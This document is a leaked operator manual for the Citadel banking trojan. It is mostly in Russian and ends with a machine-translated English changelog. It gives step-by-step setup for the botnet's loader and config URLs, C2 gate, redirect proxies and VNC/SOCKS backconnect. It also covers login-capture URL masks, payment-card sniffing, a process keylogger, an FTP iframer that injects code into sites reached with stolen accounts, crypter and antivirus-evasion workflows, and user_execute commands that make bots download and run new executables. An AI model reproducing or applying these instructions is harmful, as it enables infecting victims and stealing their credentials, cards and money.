 Указывать не обязательно. Но таких можно указывать до 20 резервных конфигов, бот поочередно будет стучаться на каждый из урлов пока не установит себе конфиг-файл. На самый последний url_config бот стучит с задержкой, через 5 часов, это сделано для защиты от автоматического парсинга урлов реверсерами.

 url_loader "http://localhost/file.php|file=test_bot.exe"

  test_bot.exe - здесь указываем название ехе-файла, который лежит в папке files/

  Файл file.php не переименовываем, оставляем с таким же именем. Путь дo file.php, папка files/ лежит рядом с файлом.

   url_server "http://localhost/gate.php"

   Здесь указываем путь до gate.php

   Остальное настраивается как зевс, если забыли формат, читайте мануал от зевса zeus_old.txt

С появлением 1.3.0.0 версии появлась необходимость собирать модули (например видеограббер) для билда, т.к боты будут выкачивать необходимые модули с вашего сервера.

Поэтому после того как собрали ехе, жмем кнопку "Создать модули" и закачиваем получившийся файл/файлы в папку webserver\files на сервере. ЭТО ПРОДЕЛЫВАТЬ ОБЯЗАТЕЛЬНО! ДАЖЕ ЕСЛИ ВЫ НЕ ИСПОЛЬЗУЕТЕ ВИДЕО.МОДУЛЬ! ИНАЧЕ БОТ НЕ БУДЕТ СТУЧАТЬ В АДМИНКУ.

   

  

  После того, как мы закачали файлы в files и залили всю папку в целом webserver + создали БД.

  Идем по адресу: http://www.vash-host.com/citadel/install

  И вписываем все значения, после чего удаляем каталог install.

  

  

********************************************************************************

==========================>>>>> Установка BackConnect Windows сервера (необходимо для функционирования VNC-админки)

********************************************************************************

Для установки серверной части, нужен Windows VPS/Dedicated желательно XP,2003,2008

Ставим веб-сервер XAMPP/WAMP, либо любой другой с поддержкой PHP. Отключаем UAC+Windows Firewall, чтобы можно было открывать порты. А также отключим политику доменов и выйдем полностью из любого домена.

Заливаем в веб-директорию комплект скриптов backconnect\winserv_php_gate

Веб-админка будет по адресу: http://ip-serv/control.html

В ней будет лог по VNC коннектам.

Возможные проблемы: из-за виндового фаерволла, проверьте этот момент очень внимательно. Не забудьте перезагрузить Windows после отключения фаерволла.

Все скрипты должны лежать в корне на сервере, никаких папок не создавать.

Если не знаете как поставить XAMPP, вот мануал: http://www.ripecms.com/documentation/articles/installing-apache-php

********************************************************************************

==========================>>>>> Установка Citadel VNC Admin

********************************************************************************

Если вы приобрели модуль VNC-админки, то в вашей панели будет доступен раздел "VNC".

Пробежимся по опциям, с которыми могут возникнуть трудности.

Для начала работы нужно нажать "Конфигурация" и вписать туда IP-адрес Windows-сервера, куда вы уже залили скрипты backconnect'a. Никаких путей не надо, просто IP-адрес.

Чем отличается коннект от автоконнект?

Если вы задаете коннект какому-то боту, то он разово выполнит эту команду и ыышлет вам данные для подключения. Если вы задаете автоконнект, то бот будет инициировать соединение с backconnect-сервером каждый раз, как только он выходит в интернет. Опция применима как к Backconnect Socks, так и к VNC.

Теперь зададим URL-маски, которые мы будем отлавливать в нашу VNC админку.

Маска URL: здесь указываем URL по схеме *mail.ru* или http://*.bank.com* (можно играться как угодно, звездочка вам в помощь)

Параметры: Здесь указываем названия POST-переменных, которые находятся на форме сайта, который мы ловим. На примере mail.ru, это будет Login* и Password*

Формат параметров простой, можно указать "login=", можно указать "login*", или просто "login". Поэтому выбирайте как вам удобнее, не забудьте протестировать маску.

Параметры не чувствительны к регистру.

Уведомлять в Jabber?: ставим опцию, если хотим чтобы каждый новый отловленный акк, приходил вам. Jabber задается в настройках, можно указать несколько через запятую.

ВАЖНО! Чтобы в разделе "Параметры" были вписаны данные Jabber-бота(Использовать исключительно Jabber.org), с которого все это будет идти к вам.

Также, есть возможность создания Автоконнекта с ботом, от которого пришел новый аккаунт в раздел. Т.е в жабер вам сразу приходит аккаунт + порт для коннекта на VNC/SOCKS.

Не забывайте, что работает контекстное меню напротив ботов, линков и т.п через правую кнопку мыши: можно удалить какие-то ненужные акки(отправить в мусор), пометить как Избранное или включить/отключить нужные настройки.

Строчка 2 ботов, 6 аккаунтов, 5 живых аккаунтов (83%) расчитывает % живых аккаунтов по принципу если бот не появлялся в сети более 4 дней, аккаунт считается мертвым.

Также, существует API для быстрого создания VNC/SOCKS соединения с нужным ботом, например во время перехвата токена или смс, вам нужно срочно зайти на акк под холдером, вы инжектом через javascript/iframe вызываете URL до api.php 

 * VNCController

 * api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC

 * api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS

 * api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC

 */ 

define('API_TOKEN_KEY', 'changethispassword'); 

И передаете IP или BotID, скрипт дает команду на установку соединения боту и данные приходят вам в жаббер. Тайминг зависит от параметра timer_stats в конфиге билдера.

Вот вам совет по работе с ботами на Win7/Vista: используйте Firefox portable для Win7/Vista - он работает корректно. Не забываем отключать wallpaper чтобы не гонять много трафика. Также, чтобы попасть в одну из директорий - нажимаем свойства ярлыка.

********************************************************************************

==========================>>>>> Установка модуля чекинга веб-соксов

********************************************************************************

Раздел "SOCKS" в админке - ничего настраивать не нужно.

********************************************************************************

==========================>>>>>  Установка модуля парсера логов

********************************************************************************

С версии 1.3.3.3 модуль доступен из админки, раздел "ссылки", сложностей возникнуть не должно.

********************************************************************************

==========================>>>>>  Работа с крипт-панелью

********************************************************************************

Существует раздел "crypt exe" он же "крипт ехе" и отображается он в основной админке Citadel. Если его нету, то читайте ниже как его активировать.

Он нужен для того, чтобы вы могли предоставить доступ вашему криптеру и он переодически перезаливал ехе-файл, который боты обновляют.

При этом, криптер не имеет доступа к остальным частям админки, для него доступен только этот раздел.

Для начала, активируем этот раздел у себя, для этого перейдем в раздел "Users", нажмем на свой логин и ниже отобразится список опций, доступный нам. Отмечаем галочками 2 пункта:

r_svc_crypter_crypt - Этот пункт дает привилегии перезаливать ехе файл.

r_svc_crypter_pay - Этот пункт дает привилегии вести таблицу оплат по перезаливкам.

Далее создаем нового пользователя и даем ему ТОЛЬКО "r_svc_crypter_crypt" права, передаем логин-пароль криптеру и он может через форму перезаливать ехе-файлы из папки files/

Не забудьте предварительно поставить chmod 777 на эту папку и доверять доступ только доверенным лицам.

Теперь, как только криптер перезаливает ехе-файл, появляется новая запись в таблице что данный ехе-файл не оплачен, вы же в свою очередь проверив все ли ок, помечаете у себя в админке что крипт Х такого-то числа оплачен. 

Можно вписать данные для Jabber-уведомления по проверке scan4you в этом же разделе.

********************************************************************************

==========================>>>>>  Установка системы редиректов (прокладка для конфига)

********************************************************************************

Генерация прокладок (file.php) для защиты конфигов (полноценная система редиректов) BETA-версия.

Генератор прокладок решает проблему переноса file.php на отдельный хост, который вы можете юзать как редирект-прокладку до вашего основного файла конфига и ехе.

Генерация прокладки осуществляет через билдер, для этого добавлена кнопка "Собрать прокладку".

На выходе получаем 2 файла, file.php, file_config.php (имя указанное в диалоговом окне при сохранении игнорируется(!)).

ВНИМАНИЕ: file_config.php содержит ваш encryption key в преобразованном виде, он берется из вашего конфига, поэтому при генерации гейта конфиг должен быть настроенным и валидным,

Теперь загружаем файлы file_config,php, file.php на прокладку и создаем там же папку files, куда помещаем exe, config + video module файлы.

Для запрета прямого доступа к файлам в папке files создаем файл .htaccess следующего содержания:

deny from all

В настройках конфига задаем url_config1, url_loader до прокладки.

Если хотите защитить гейт  и создать для него прокладку, есть файлик other/redir.php, открываем его и прописываем путь до РЕАЛЬНОГО гейта

//URL оригинального сервера.

$url = "http://localhost/s.php";

После чего сохраняем срипт под любым именем и указываем в конфиге бота путь в качестве гейта (url_server)

!Важно! Чтобы на хосте были разрешены сокеты в PHP, иначе работать не будет.

Проверить это можно создав файл 1.php с <?php phpinfo(); ?>

Он должен показывать  Sockets Support enabled 

Прокладки на данный момент не передают видео и скриншоты, только логи. Это единственный минус.!!

********************************************************************************

==========================>>>>>  Краткий мануал по новым фичам

********************************************************************************

1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли

сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!

=> Для начала нажмем кнопку Настройки: впишем туда Scan4you Profile ID(ИМЕННO ID, А НЕ ЛОГИН!!), Scan4you API Token, Jabber для уведомлений. Взять эти данные можно в настройках профиля scan4you.net

Потом идете в раздел ПАРАМЕТРЫ и  вписываете данные Jabber-бота (предварительно зарегав аккаунт для бота), рекомендуется юзать jabber.org

Все готово.

2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8

В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 encryption_key ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 45%, ваши боты будут иметь самый свежий и чистый билд.

=> Путь до ехе-файла берется из секции "url_loader", соответственно чем чаще вы перезаливаете чистый ехе, тем чище ехе-файл имеют ваши боты у себя. Они его скачивают и перезапускают, обновляя себя.

4) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.

Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.

=> Это все можете вы увидеть в разделе онлайн-плеер, разберетесь сами там все просто.

=> Мануал по экспортеру видео-файлов для админок АЗ на основе онлайн-плеера.

Запросы такого вида:

/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111

/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8

в ответ выдают php-массивы или JSON

Формат запросов:

api.php/<security-token>/video/<action>[.<extension>]?<params>

<security-token> параметр-ключ, который вы задаете в скрипте api.php и он нужен для авторизации на сервере.

<action> — команда

<extension> — (опционально) расширение: формат вывода. Если опустить — виден дебаг-вывод. Возвожные значения: .dump, .php, .json, .xml

<params> — параметры функции контроллера (можно посмотреть в коде)

Примеры запросов:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1

http://citadelhost.ru/folder/api.php/ahro4uNg/video/embed?botnet=COOL&botId=WIN-ABC123&video=balakhan.webm

Параметр botnet не обязателен.

citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

И еще: подставив расширение — можно получить желаемый формат:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.php?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.json?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.xml?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

добавив параметр &embed=1 можно получить сразу HTML-код вставки  для всех видеофайлов, но не рекомендую: их может быть много) там для этого отдельная функция есть.

Пример без передачи имени ботнета:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1

5) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.

=> Увидите отдельный раздел "CMD Парсер".

6) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.

Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.

=> Раздел "Установленный Софт", если вы видите в графиках много "Unknown" значит на боте не стоит антивируса или фаерволла. Также, нажав поиск отчетов по боту, вы увидите новый вид отчета.

7) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом в разделе "Избранные отчеты"

=>   Новые параметры в конфиг-файле.

enable_luhn10_get 1

enable_luhn10_post 1

GET LUHN10 - анализирует данные в GET-запросах и WinSocket/Wininet на предмет карт и дампов, по алгоритму en.wikipedia.org/wiki/Luhn_algorithm

POST LUHN10 - анализирует POST данные в https:// запросах.

Чтобы найти карты, выберите тип отчета: "LUHN10 запрос" в разделе "Поиск в базе данных".

8) Работа с API.php. Через API можно выдернуть ftp-аккунты для вашего ифреймера.

 *  IFramerController:

 *      api.php/<token>/iframer/ftpList

 *      api.php/<token>/iframer/ftpList?state=all

 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31

 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all

 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1

За остальными примерами работы с API, смотрите в комментариях к скрипту api.php

********************************************************************************

==========================>>>>>  Как обновлять админку и бота на следущие версии Citadel

********************************************************************************

Перезалейте и перезапишите все скрипты на сервере и зайдите в папку /install/, нажав кнопку Update - ждите пока ваши таблицы обновятся, это может занять долгое время.

Если у вас слишком забита БД, вам имеет смысл поставить админку заново в новую папку и перебросить на нее ботов командой user_execute http://www.host.com/newcitadel.exe

Обратите внимание, формат конфига с каждой новой версией может меняться, поэтому для того чтобы все работало корректно, настройте НОВЫЙ(идущий в архиве с версией) конфиг под ваши параметры и перезалейте его в папку files, вместе с exe-файлом и видео-модулем (ОБЯЗАТЕЛЬНО). Обращайте внимание на новые появившиеся опции в конфиг-файле, который мы даем вместе с билдером.

После чего, для того, чтобы ваши боты обновились на новую версию, дайте команду user_execute http://www.temphost.com/newcitadel.exe

Проверьте, что ехе доступен с веба по данному линку.

Enjoy.

********************************************************************************

==========================>>>>>  Описание дополнительных опций в конфиге билдере

********************************************************************************

  disable_cookies 1/0 - Если стоит 1, cookies не будут присылаться вам в админку.

  disable_antivirus 1/0 - Если стоит 1, модуль MiniAV будет выключен.

  enable_luhn10_get 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в GET запросе.

  enable_luhn10_post  1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в POST запросе.

  remove_certs 1 - Если стоит 1, сертификаты слаться не будут.

  timer_autoupdate 8 - Время в часах, автообновления ехе из папки files/. Иначе говоря через сколько часов, скачивать и запускать ехе каждый раз.

  disable_httpgrabber 1 - Если стоит 1, отключается граббер HTTP отчетов в Google Chrome(только в нем)

  report_software 1 - Если стоит 1, отсылать информацию о фаерволле/антивирусе/софте в админку.

Секция  entry "WebFilters"

  Для активации скриншотов, вставляем мачку "@*paypal.com/*"

  Если нужны скриншоты полного экрана, то "@@*paypal.com/*"

  Для активации видео-записи,  "#*paypal.com/*"

entry "WebFakes" - ВЕБФЕЙКИ НЕ РАБОТАЮТ!!

********************************************************************************

==========================>>>>>  FTP-ифреймер. Характеристика

********************************************************************************

A) Скрипт ифреймера

Заливается на левый сайт и используется как "прокладка": осуществляет всю работу. Нажмите "Скачать скрипт" и залейте его по фтп на какой-нибудь левый хост.

Им управляет специальный crontask из вашей админки.

Возможности отладки:

* Создать рядом со скриптом папку iframer/ доступную на запись. Туда он может сохранять предпросмотр ифрейминга файлов.

* Создать рядом со скриптом файл 'iframer.php.log' (имя скрипта с расширением + .log): он туда автоматически начнёт писать логи действий, найденные папки, ...

* Не забудьте выставить права 666,777 если хотите отладку сделать.

Скачать его можно на странице ифреймера в панельке: [download].

Физически он лежит в system/utils/. Здесь он напрямую не вызывается, просто хранится :)

Сам ифреймер для работы не требует никаких файлов и прав записи: он аккуратно использует PHP-сессии для хранения даннях.

B) Конфигурация

Позволяет задать:

* URL скрипта-ифреймера для запуска.

* HTML-код для вставки

* Режим действия. 'off' выключен, 'inject' вставлять HTML-код, 'preview' предпросмотр без изменения файлов на FTP: сохранять проифреймленные файлы в папку 'iframed/' рядом со скриптом (если она существует и доступна на запись)

* Метод инъекции: умный(не повреждает PHP/JS/ASP файлы) , запись в конец, перезапись

* Глубина обхода папок (уровни от 1 до 50)

* Маски для файлов и папок. 

 Файл ифреймится только в том случае если и папка, и файл подошли к одной из масок.

 Если папка совпала с маской — глубина обхода увеличивается (на случай глубоко заложенного public_html)

C) Принцип работы клиентской части

Во-первых, перед каждой фазой общения панельки с ифреймером последний проходит самотестирование: все ли жизненноважные для работы функции включены, предсказуемо ли ведёт себя сервер, .... Если selftest не выполнен — никакая работа выполняться не будет.

Один cronjob раз в 10 минут собирает новые ftp-аккаунты из базы и создаёт задания. Повторные ftp-акки не допускаются.

Эти аккаунты постятся на скрипт-ифреймер и добавляются к списку "заданий" вне зависимости от того запущен он сейчас или нет.

Другой cronjob также выполняется раз в 10 минут. Он просто запускает скрипт-ифреймер: если он всё ещё работает — ничего не происходит, однако если он там сдох (например, time limit) — будет произведён перезапуск. Порог перезапуска 120сек

И, наконец, последний cronjob: он каждую минуту спрашивает ифреймер как у него там дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.

Во избежание возможных ошибок вся передача данных двухэтапная: запрос, ответ, запрос-подтверждение, действие.

Если в течение суток по аккаунту нет результатов — он отправляется снова.

D) Принцип работы самого ифреймера

В начале скрипта указан список игнорируемых расширений файлов. Они не изменяются даже если подошли к одной из масок.

Ифреймер хранит данные в сессии: они включены на всех хостингах и нет нужды играться с правами или искать папку доступную для записи :) Написан с учётом возможной работы даже под PHP4 (это надо проверить при случае).

Ифреймер умеет правильно перезапускаться и дохнуть по timelimit'у: никакие важные данные не потеряются, он сможет продолжить с места остановки.

При разрыве подключения ифреймер умеет реконнектиться при следующем запуске.

Фазы работы:

1. Попытка коннекта. Если она не удаётся 3 раза подряд — акк отмечается как невалидный.

Если много акков к которым не удаётся подключиться — ифреймер может "подвисать" сгребая таймауты. Это нормально: он пытается :)

2. Попытка аутентификации. Если не удаётся — акк невалидный.

3. Листинг всех папок и файлов до указанной глубины. Выборка файлов и папок подходящих по маске указанной в админке. Для подошедших папок глубина обхода увеличивается.

4. Фаза ифрейминга. Замечу, что в режиме 'preview' файлы на FTP не изменяются!

Для каждого файла определяется его тип (по расширению), что определяет метод ифрейминга. Поддерживаются: html, php, CSS, JS, asp (и эквивалентные расширения)

К коду ифрейма добавляется специальный маркер для избежания случайного повторного ифрейминга файла.

В режиме smart код добавляется в начало php-файла, однако сам ифрейм выводится в конце :)

В режиме append код добавляется в конец файлов. Умно определяется синтаксис чтобы не сломать код. JS-файлы заражаются через внедрение кода рисующего iframe.

* На всех этапах собирается статистика, список изменённых файлов.

Ифреймером управляют два задания:

* "запуск" отрабатывает автоматом каждые 10 минут: он постит новые аккаунты и включает долгий процесс их проверки.

* "сбор" — каждую минуту, забирает что готово

E) Интерфейс

Показывает состояние ифреймера (на самом деле, состояние cron-задач). Можно вручную дёрнуть задание чтобы обновить информацию.

Показывает список аккаунтов. Для каждого: Состояние, ошибки, список страниц (по клику), статистика (по клику).

Невалидные аккаунты удаляются через сутки: повисели и пропали.

*) Принцип работы заданий и ифреймера на пальцах:

Задание "запуск": раз в 10 минут

Получить несколько новых акков и дописать их в конец списка задач.

Дальше ифреймер проходит по списку задач (аккаунтов)

Берём 1й акк. Коннектим. Не получилось в течение 10сек? Отложим, перепроверим.

Берём 2й. Подключилось! Авторизация зато не удалась. С этим закончили, он невалидный.

Берём 3й. Не коннектит. Тоже перепроверим.

Берём 4й. Подключились. Авторизовались. Парсим.. ифреймим.. закончили, он валидный.

Задание "сбор": 

оно в ЛЮБОЙ момент может подключиться и выхватить промежуточные результаты) Здесь это 2й и 4й, если они успели отработать.

Когда 1й и 3й акк словят ещё несколько дисконнектов — они тоже будут отмечены как невалидные.

Добавленные позднее фичи:

- Режим "check only". Говорит за себя

- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.

- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится а заменит собой старый :)

- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы игноры расставить)

- Логирование ошибок ифреймера (!)

- Умное распознавание папок (они неотличимы от файлов)

- Кнопка сброса. Благодаря защите от повторного ифрейма аккаунты она не испортит :) Заигноренные акки сохраняются (т.е. тоже не испортятся)

- Выборочный игнор аккаунтов (не ифреймить ни за что). Отмеченные игнором аккаунты отображаются сутки и прячутся. Если сделать сброс — они останутся и повисят ещё сутки.

- Сортировка: последние события (найден, отправлен, обработан) в хронологическом порядке сверху

- рычаг ручного запуска (полностью ручной режим). Это делается с помощью кликов по заданиям вверху, если ифреймер в режиме "off"

  Например: кликаешь первое, получаешь новые акки. Нужные заигнорил, кликаешь второе: они улетают на обработку.

  Третье задание — сбор результатов — всегда отрабатывает само :)

  

********************************************************************************

==========================>>>>>  Кейлоггер процессов

********************************************************************************

Для включения кейлоггера, в конфиге билдера прописываем новую секцию:

 entry "Keylogger"

    processes "calc.exe;*notepad*"

    time 1

  end

  *notepad* поиск нужного процесса по имени

  calc.exe точное название процесса

  Здесь мы перечисляем список процессов, на которые мы устанавливаем кейлоггер.

  Напомню, что кейлоггер по умолчанию включен для всех браузеров, поэтому пользуйтесь модулем, если вам необходимо отследить отдельно-взятые приложения.

  time 1 указывает на время в минутах, сколько минут подряд, с момента запуска приложения записывать клавиши.

  Секцию нужно прописать перед секцией  entry "CmdList" или после нее.

  

  Для поиска отчетов в админке, выбираем тип отчета: "Кейлоггер"

  

********************************************************************************

==========================>>>>>  Фильтровая GeoIP защита ботнета

********************************************************************************

Для включения модуля, заходим в раздел "Параметры" в админке, там есть пункт "Разрешённые страны", ставим галочку для включения и отмечаем нужные страны.

Все страны, которые будут не отмечены вами, автоматически попадают в игнор-лист, однако, отчеты от них все равно будут писаться, но при запросе конфига через file.php и отсылки запросов на гейт, ботам будет выдаваться ошибка 404 на уровне HTTP-сервера (это можно проверить снифером)

Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.

Если заметили сильную нагрузку на сервер, немедленно отключайте настройку.

********************************************************************************

==========================>>>>>  Дубль-клинер логов

********************************************************************************

Для включения и отключения модуля, необходимо перейти в раздел "Параметры", подраздел Функции - "Дедупликация отчетов" включаем и отключаем.

Если заметили большую нагрузку на сервер, немедленно отключаем этот модуль в настройках.

  

********************************************************************************

==========================>>>>>  Общая рекомендация и частые вопросы

********************************************************************************

Для избежания проблем на сервере со скриптами, рекомендуется устанавливать PHP 4.3

Если вы хотите швейцарскую гарантию от реверса, вскрытия файлов на сервере, 100% защиты от трекеров и любых недугов, рекомендуем вам установить привязку на вашем сервере на страну, по которой вы работаете.

К примеру все ваши файлы по http будут доступны только юзерам, зашедшим с Испании, остальным, с других стран будет выдаваться 404.

Сделать это можно при помощи GeoIP модуля на сервер nginx, либо установить привязку на DNS.

Если интересно, можем дать команды хороших админов, кто может помочь в этом вопросе.

Как это сделать и советы по защите ботнета, вы можете ознакомиться в статье в "База знаний" внутри СРМ.

Также, хотим обратить внимание на то, что софт НЕ будет работать совместно с Proxifier'ом !

Если вы тестируете на виртуалке или у себя, обратите внимание чтобы у вас не было в системе русской или украинской раслкадки - иначе работать ничего не будет.

Также, вполне вероятны сбои на х64 - на система софт срабатывает корректно 50 / 50

Для просмотра видео в админке в онлайн-плеере нужно использовать Opera (насчет других браузеров хз как, пробуйте). У себя можно посмотреть через плеер VLC.

Теперь рекомендация криптерам по крипту Citadel:

- пеедавать адрес тело через GetModuleHandle с параметром NULL

- сохранять тело(целостность секций) 

- сохранять оверлей

Инжекты полностью совместимы с зевсоформатом.

Не забудьте отключить антиэмулятор в конфиге, который задается опцией antiemulation_enable 1/0 (1 - включено, 0 - выключить).

Если опция включена, софт не будет работать на VMware, вместо этого софт будет генерировать кучу фейк-запросов на несуществующие домены, чтобы ввести в заблуждение автоматические ханипоты и реверсеров. Не пугайтесь этого :) Все запросы поддельные.

Если не знаете что такое антиэмулятор, посмотрите в самом начале анонос новостей.

Пароль на пришедшие в логи сертификаты: pass

Если испытываете проблемы с нагрузкой на сервер(админка еле грузится) попробуйте увеличить значение key_buffer  в 2 раза больше (к примеру 512M) в конфиге MySQL (my.cnf)

Еще хотим обратить внимание на параметры в конфиге,

например параметр timer_config 1 5

timer_config [number1] [number2]

Определяет интервал времени в минутах, через которое бот обновляет с сервера конфиг.

[number1] - интервал в минутах, действующий в случае успешной загрузки конфига в прошлый раз.

[number2] - интервал в минутах, действующий в случае неудачной загрузки конфига в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться обновить конфиг через указанный промежуток времени)

timer_logs [number1] [number2]

Определяет интервал времени в минутах, через которое бот отправляет накопленные логи.

[number1] - интервал в минутах, действующий в случае успешной отправки логов на сервер в прошлый раз.

[number2] - интервал в минутах, действующий в случае неудачной отправки логов на сервер в прошлый раз. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться отправить накопленные и накапливаемые далее логи через указанный промежуток времени)

timer_stats [number1] [number2]

Определяет интервал времени в минутах, через которое бот отстукивает в админку и получает из нее команды.

Из этих данные админка анализирует нахождение бота в онлайн, а также при каждом отстуке отправляет новые имеющиеся команды,

например, на открытие сокса.

[number1] - интервал в минутах, действующий в случае успешного соединения с админкой.

[number2] - интервал в минутах, действующий в случае неудачного соединения с админкой. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться достучаться до админки через указанный промежуток времени)

timer_modules [number1] [number2]

Определяет интервал времени в минутах, через которое бот обновляет с сервера модули, например, видеомодуль.

[number1] - интервал в минутах, действующий в случае успешной загрузки видеомодуля в прошлый раз.

[number2] - интервал в минутах, действующий в случае неудачной загрузки видеомодуля в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться загрузить видеомодуля через указанный промежуток времени)

timer_autoupdate [number1]

Определяет интервал времени в часах, при котором бот будет обновлять EXE с новым криптом.

[*]Что значит Unknown в статистике фаерволлов/антивирусов на pie-chart'e ? Это значит, что на ПК не стоит ни антивирус, ни фаерволл.

[*] ВАЖНОЕ ЗАМЕЧАНИЕ ПО КОМАНДАМ: ЕСЛИ ВЫ ДАЕТЕ КАКУЮ-ТО КОМАНДУ ЧЕРЕЗ РАЗДЕЛ СКРИПТЫ И УКАЗЫВАЕТЕ ВЫПОЛНЕНИЕ КОМАНДЫ НА ОПРЕДЕЛЕННУЮ СТРАНУ, НАПРИМЕР "US", ТО ОБЯЗАТЕЛЬНО ВКЛЮЧЕНИЕ В РАЗДЕЛЕ "ПАРАМЕТРЫ" ОПЦИИ "GeoIP по каждому отчёту (только небольшие ботнеты)"

------------------------------------------------------------------------------------------- 

Personal Manual - Google Translatel (Pastebin)

------------------------------------------------------------------------------------------- 

Version 1.3.4.5

Manual Version: 2.0 (last updated 06/06/2012)

List of new features for the bot:

[+] Fixed a bug in the VNC Vista / Windows 7. Now we can fully work with Internet Explorer 8 (remember, there was a problem with the rendering of IE)

[+] Support for Mozilla Firefox 7.0 (fixed an issue where not sent reports to the latest versions of the browser)

[+] Crypto-protection (body decrypted in memory).

[+] Redirects DNS (not through the hosts). You can block / redirect any URLs without fear that they will notice heuristics. For example AV-block or redirect servers are pagu bank to another host.

! BONUS! List URLs of popular anti-virus software to block comes.

[+] Version information in the report sotfa. Will send you a detailed version of the browser Holder together with the report. It helps in simulated settings Holder.

[+] Extra level of protection for the server on trackers - Login Key.

[+] Mechanism autintefikatsii boot config (no direct URLs.) It gives full protection from the established trackers.

[+] Support grabber Google Chrome. [Tested on the latest 15.x/16.x/17.x].

[+] Support injector Google Chrome. [Tested on the latest 15.x/16.x/17.x].

[+} Added caching of search functions, which speeds up the installation of hooks Chrome.

[+] Added ability to execute system commands CMD at the start of the bot (section CMDList) sending a report to the server. For example, you need to for installs, the team went a result of "ipconfig / all", or a list of all available ball. It is useful in analyzing the internal structure of companies. (For example, often come across bots in LAN with the names of ACCOUNTANT_PC, POS_SERV, DATABASE ...)

[+] Added a mechanism to verify the safety hooks on some Windows.

[+] Heuristic analysis environment a sheet with a stop to unwanted software (greatly increases stealth), included all the popular anti-virus software.

[+] Fixed minor bugs.

[+] Video Grabber. A unique opportunity to monitor the work of your injector "eyes holder" in the config file specifies a list of sites and the length of video recording in seconds, at call on a given link is activated video recording format. Mkv. It is recommended to configure your server to receive files 60 MB 10.

[+] Removed the delete cookies when installs, considering it knocks "fingerprint" when working with Holder bays.

[+] Added support for HTTP 1.0 and the extended headers (eg responz not always look like "HTTP/1.1 200 OK", is "HTTP/1.1 200 follow document", in this case, after the code is 200 more words) applies to browsers Firexfox & Chrome

[+] Added a gate generator (in case you want your files to an intermediate host for a round-trip).

[+] Completely redone encrypt (data, record logs / video, download configs, etc) in the Citadel, to replace the outdated RC4 used in Zeus, came to AES 128. Recall that gave asechku RC4, when mass produced were different decryptors config / injector for Zeus, and the hosts began to palitsya abuse.ch.

